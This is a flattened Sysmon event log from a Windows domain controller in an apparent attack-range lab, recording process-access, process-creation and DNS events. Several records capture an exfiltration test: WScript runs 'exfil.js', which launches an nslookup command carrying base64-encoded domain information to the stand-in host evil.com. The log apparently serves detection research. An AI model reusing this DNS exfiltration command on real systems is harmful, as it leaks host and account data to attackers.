14:16:23.496{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.496{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.496{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-773F-000000005F02}5108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.496{2E1864BB-17B7-629A-753F-000000005F02}72087432C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-773F-000000005F02}5108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.499{2E1864BB-17B7-629A-773F-000000005F02}5108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-753F-000000005F02}7208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhgvlzji.tmp 2>&1 10341000x8000000000000000198035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.474{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-763F-000000005F02}5112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.474{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-763F-000000005F02}5112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.458{2E1864BB-17B7-629A-763F-000000005F02}51127280C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-753F-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.458{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-763F-000000005F02}5112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-753F-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-17A1-629A-783D-000000005F02}5552508C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-753F-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.447{2E1864BB-17B7-629A-753F-000000005F02}7208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhgvlzji.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.443{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlikw.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000198023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.224{00000000-0000-0000-0000-000000000000}5580<unknown process>-udpfalsefalse127.0.0.1-52484-false127.0.0.1-53domain 354300x8000000000000000198022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.224{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52484- 354300x8000000000000000198021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.224{00000000-0000-0000-0000-000000000000}5580<unknown process>-udptruefalse127.0.0.1-52484-false127.0.0.1-53domain 354300x8000000000000000198020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.093{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-52483-false127.0.0.1-53domain 354300x8000000000000000198019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.093{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52483- 354300x8000000000000000198018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.093{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-52483-false127.0.0.1-53domain 354300x8000000000000000198017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.093{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-52482-false127.0.0.1-53domain 354300x8000000000000000198016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.092{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52482- 354300x8000000000000000198015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.092{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-52481-false127.0.0.1-53domain 354300x8000000000000000198014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.091{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52481- 354300x8000000000000000198013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.091{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-52481-false127.0.0.1-53domain 354300x8000000000000000198012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.932{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52480- 354300x8000000000000000198011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.932{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-52480-false127.0.0.1-53domain 354300x8000000000000000198010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.932{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-52479-false127.0.0.1-53domain 354300x8000000000000000198009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.932{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52479- 354300x8000000000000000198008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.931{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52478- 354300x8000000000000000198007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.931{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-52478-false127.0.0.1-53domain 354300x8000000000000000198006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-52477-false127.0.0.1-53domain 10341000x8000000000000000198005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.411{2E1864BB-17B7-629A-733F-000000005F02}9686248C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-743F-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000198004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52477- 354300x8000000000000000198003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-52476-false127.0.0.1-53domain 354300x8000000000000000198002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52476- 354300x8000000000000000198001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-52476-false127.0.0.1-53domain 354300x8000000000000000198000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-52475-false127.0.0.1-53domain 354300x8000000000000000197999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.809{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52475- 354300x8000000000000000197998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.809{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-52475-false127.0.0.1-53domain 354300x8000000000000000197997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{00000000-0000-0000-0000-000000000000}7536<unknown process>-udpfalsefalse127.0.0.1-52474-false127.0.0.1-53domain 354300x8000000000000000197996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52474- 354300x8000000000000000197995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{00000000-0000-0000-0000-000000000000}7536<unknown process>-udptruefalse127.0.0.1-52474-false127.0.0.1-53domain 354300x8000000000000000197994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{00000000-0000-0000-0000-000000000000}7536<unknown process>-udpfalsefalse127.0.0.1-52473-false127.0.0.1-53domain 354300x8000000000000000197993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52473- 354300x8000000000000000197992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{00000000-0000-0000-0000-000000000000}7536<unknown process>-udptruefalse127.0.0.1-52473-false127.0.0.1-53domain 354300x8000000000000000197991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{00000000-0000-0000-0000-000000000000}7536<unknown process>-udpfalsefalse127.0.0.1-52472-false127.0.0.1-53domain 354300x8000000000000000197990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52472- 354300x8000000000000000197989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.657{00000000-0000-0000-0000-000000000000}7536<unknown process>-udptruefalse127.0.0.1-52472-false127.0.0.1-53domain 10341000x8000000000000000197988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000197987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.585{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52471- 354300x8000000000000000197986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.582{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52470- 354300x8000000000000000197985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.581{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52469- 354300x8000000000000000197984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.581{00000000-0000-0000-0000-000000000000}7236<unknown process>-udptruefalse127.0.0.1-52469-false127.0.0.1-53domain 10341000x8000000000000000197983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-743F-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 